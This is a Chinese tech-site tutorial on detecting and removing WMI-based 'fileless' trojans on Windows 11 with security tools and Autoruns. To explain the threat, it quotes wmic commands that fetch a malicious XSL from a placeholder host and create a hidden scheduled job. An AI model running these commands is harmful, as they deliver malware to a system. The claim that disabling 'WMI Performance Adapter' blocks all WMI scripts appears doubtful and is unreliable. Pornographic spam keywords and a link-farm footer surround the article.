电脑知识|欧美黑人一区二区三区|软件|欧美黑人一级爽快片淫片高清|系统|欧美黑人狂野猛交老妇|数据库|服务器|编程开发|网络运营|知识问答|技术教程文章 - 好吧啦网

您的位置:首頁技術文章
文章詳情頁

怎么徹查Win11的WMI木馬

瀏覽:101日期:2023-05-21 11:10:12

WMI是一個windows11系統中非常核心的功能,我們可以通過運用這個功能來實現腳本部署、進程枚舉、監控目錄修改等常見的操作,但是總有一些不懷好意的人對此進行木馬病毒的植入,一旦WMI被植入木馬病毒,由于其特殊性,會對我們的系統造成非常嚴重的損傷,那么該如何解決這個問題呢?感興趣的小伙伴們可以往下看看。

怎么徹查Win11的WMI木馬

Win11 WMI木馬查殺方法分享

1. 了解WMI惡意軟件的運行機制

如上所述,WMI具備的功能非常豐富,對于黑客來說只要利用其中的命令就可以完成很多操作。比如獲得相應的權限后,在目標電腦上使用“wmic os get /FORMAT:"http://www.xxxx.com:80/123.xsl"”命令就可以實現從網站服務器上下載所需的惡意軟件123.xsl(圖1)。

怎么徹查Win11的WMI木馬

當然在實際運行中,這些惡意軟件還可以利用WMI進行更多的操作,如使用“wmic job call create "123.exe",0,0,true,false,********154800.000000+480”命令創建一個在后臺運行的任務計劃,甚至可以執行創建系統服務、將DLL文件注入系統進程等操作。因為這里使用的都是系統命令(wmic.exe),并不像常規的木馬、病毒那樣由本體執行,所以稱之為“無文件”(嚴格來說是WMI腳本運行,腳本被觸發后執行下載木馬等操作)方式運行。比如臭名昭著的“KingMiner挖礦木馬”,它通過WMI事件訂閱來不斷地觸發木馬在后臺運行。

●火速鏈接:

本刊2018年6期文章《解決WMI進程資源占用的問題》介紹了WMI的相關知識。

2. 發現和識別WMI惡意軟件

WMI木馬的一個重要特性就是借助WMI腳本來下載或者激活木馬運行。比如某WMI挖礦木馬感染電腦后會在系統里生成一個任務計劃,任務會在后臺連接到服務器下載挖礦木馬。挖礦木馬運行后會占用系統大量的資源和帶寬,導致Windows在日常使用時運行緩慢,網頁打開速度也變得很慢,且電腦的硬盤指示燈一直在閃爍(因為木馬會在后臺不斷地讀取數據)。如果自己的電腦在使用時有上述的異?,F象,那么就需要使用安全軟件檢查是否中了木馬。

Windows 10用戶可以先使用系統自帶的“安全中心”進行查殺,如果無法解決問題則可以借助一些木馬專殺軟件,如火絨惡性木馬專殺工具(https://bbs.huorong.cn/thread-18575-1-1.html)進行查殺,啟動軟件后點擊“立即掃描”,常見的木馬(包括WMI木馬)一般都可以被自動查殺(圖2)。

怎么徹查Win11的WMI木馬

不過,如果中了WMI木馬,安全軟件只會將WMI腳本下載的木馬文件刪除,但是無法完全斬斷WMI木馬文件的下載途徑,如上述介紹的WMI挖礦木馬就是利用任務計劃進行下載。因為任務計劃中并沒有惡意軟件,安全軟件是不會將其刪除的,所以通過專殺軟件刪除木馬后,每次重啟系統掃描后還是一直提示發現木馬文件,那么就極可能中了WMI木馬,這時就還需要對系統的啟動項進行檢查,查看是否有異常的啟動項。

系統啟動項檢查可以借助Autoruns來完成(https://docs.microsoft.com/zh-cn/sysinternals/downloads/autoruns),啟動程序后它會自動對本機所有的啟動項目進行檢測,包括計劃任務、服務、WMI等(圖3)。

怎么徹查Win11的WMI木馬

比如筆者公司的一臺電腦在執行安全掃描時就發現木馬文件無法徹底刪除的現象,在本機運行Autoruns后切換到“計劃任務”,在打開的窗口中就可以看到后臺所有的任務計劃。對于沒有數字簽名的任務,程序會使用淺紅色進行標注,可以看到本機中一個名為“lsmosee”的任務極為可疑,它加載的是本機臨時目錄中的一個VBS文件(圖4)。

怎么徹查Win11的WMI木馬

在上圖選中“lsmosee”并右擊,選擇“跳轉到文件夾”,在打開的文件夾中根據圖上“鏡像路徑”的提示,使用記事本打開“54236.vbs”文件,其中顯示的正是一些WMI腳本的內容,它的作用就是在后臺定時下載木馬文件?,F在按提示將其刪除。接著返回上圖,選中“lsmosee”任務并點擊“刪除”,這樣就可以切斷木馬的下載通道。最后使用火絨安全軟件再掃描一遍電腦,刪除其他帶毒的文件后,問題得到順利的解決(圖5)。

怎么徹查Win11的WMI木馬

3. 一勞永逸封禁WMI木馬下載

WMI木馬難以查殺的原因就是由于它的下載方式是通過WMI腳本實現,而且WMI腳本激活的方法很多(如上例為任務計劃,有些則是使用進程注入等),不過WMI腳本的運行要依賴“WMI Performance Adapter”服務,因此對于個人用戶來說,可以通過停用服務的方法來禁止WMI腳本的運行。在桌面的任務欄搜索框中輸入“服務”,打開服務管理組件后找到上述服務,雙擊打開后將其停止,并將其啟動類型設置為“禁用”,這樣本機所有的WMI腳本就無法運行了(圖6)。

怎么徹查Win11的WMI木馬

注意:

禁用WMI服務可能會導致一些網絡服務無法使用。禁用服務如果影響電腦使用,請及時進行恢復。

上文就是小編為您帶來的Win11 WMI木馬查殺方法了,若還有疑問請多多關注好吧啦網手機教程頻道!

標簽: Windows系統 win11
相關文章:
主站蜘蛛池模板: 温州食堂承包 - 温州市尚膳餐饮管理有限公司 | 废水处理-废气处理-工业废水处理-工业废气处理工程-深圳丰绿环保废气处理公司 | 光栅尺_Magnescale探规_磁栅尺_笔式位移传感器_苏州德美达 | 杭州网络公司_百度SEO优化-外贸网络推广_抖音小程序开发-杭州乐软科技有限公司 | 大型低温冷却液循环泵-低温水槽冷阱「厂家品牌」京华仪器_京华仪器 | 超声波清洗机-超声波清洗设备定制生产厂家 - 深圳市冠博科技实业有限公司 | 滑石粉,滑石粉厂家,超细滑石粉-莱州圣凯滑石有限公司 | 定硫仪,量热仪,工业分析仪,马弗炉,煤炭化验设备厂家,煤质化验仪器,焦炭化验设备鹤壁大德煤质工业分析仪,氟氯测定仪 | 中医治疗皮肤病_潍坊银康医院「山东」重症皮肤病救治平台 | ET3000双钳形接地电阻测试仪_ZSR10A直流_SXJS-IV智能_SX-9000全自动油介质损耗测试仪-上海康登 | 宁夏档案密集柜,智能密集柜,电动手摇密集柜-盛隆柜业宁夏档案密集柜厂家 | 标准品网_标准品信息网_【中检计量】 | 煤矿支护网片_矿用勾花菱形网_缝管式_管缝式锚杆-邯郸市永年区志涛工矿配件有限公司 | 广州展览制作工厂—[优简]直营展台制作工厂_展会搭建资质齐全 | 青岛侦探_青岛侦探事务所_青岛劝退小三_青岛调查出轨取证公司_青岛婚外情取证-青岛探真调查事务所 | 塑木弯曲试验机_铜带拉伸强度试验机_拉压力测试台-倾技百科 | 低压载波电能表-单相导轨式电能表-华邦电力科技股份有限公司-智能物联网综合管理平台 | 牛皮纸|牛卡纸|进口牛皮纸|食品级牛皮纸|牛皮纸厂家-伽立实业 | 吨袋包装机|吨包秤|吨包机|集装袋包装机-烟台华恩科技 | 液压油缸-液压缸厂家价格,液压站系统-山东国立液压制造有限公司 液压油缸生产厂家-山东液压站-济南捷兴液压机电设备有限公司 | 模型公司_模型制作_沙盘模型报价-中国模型网| 新能源汽车电池软连接,铜铝复合膜柔性连接,电力母排-容发智能科技(无锡)有限公司 | 折弯机-刨槽机-数控折弯机-数控刨槽机-数控折弯机厂家-深圳豐科机械有限公司 | 龙门加工中心-数控龙门加工中心厂家价格-山东海特数控机床有限公司_龙门加工中心-数控龙门加工中心厂家价格-山东海特数控机床有限公司 | 郑州巴特熔体泵有限公司专业的熔体泵,熔体齿轮泵与换网器生产厂家 | led全彩屏-室内|学校|展厅|p3|户外|会议室|圆柱|p2.5LED显示屏-LED显示屏价格-LED互动地砖屏_蕙宇屏科技 | 塑料检查井_双扣聚氯乙烯增强管_双壁波纹管-河南中盈塑料制品有限公司 | 拉卡拉POS机官网 - 官方直营POS机办理|在线免费领取 | 铣床|万能铣床|立式铣床|数控铣床|山东滕州万友机床有限公司 | 聚丙烯酰胺_阴离子_阳离子「用量少」巩义亿腾厂家直销,售后无忧 聚合甘油__盐城市飞龙油脂有限公司 | 间苯二酚,间苯二酚厂家-淄博双和化工 | 钢化玻璃膜|手机钢化膜|钢化膜厂家|手机保护膜-【东莞市大象电子科技有限公司】 | 双能x射线骨密度检测仪_dxa骨密度仪_双能x线骨密度仪_品牌厂家【品源医疗】 | 数年网路-免费在线工具您的在线工具箱-shuyear.com | 膜结构_ETFE膜结构_膜结构厂家_膜结构设计-深圳市烨兴智能空间技术有限公司 | 企典软件一站式企业管理平台,可私有、本地化部署!在线CRM客户关系管理系统|移动办公OA管理系统|HR人事管理系统|人力 | 聚丙烯酰胺_厂家_价格-河南唐达净水材料有限公司 | 自恢复保险丝_贴片保险丝_力特保险丝_Littelfuse_可恢复保险丝供应商-秦晋电子 | 烟气换热器_GGH烟气换热器_空气预热器_高温气气换热器-青岛康景辉 | 天坛家具官网| 深圳快餐店设计-餐饮设计公司-餐饮空间品牌全案设计-深圳市勤蜂装饰工程 |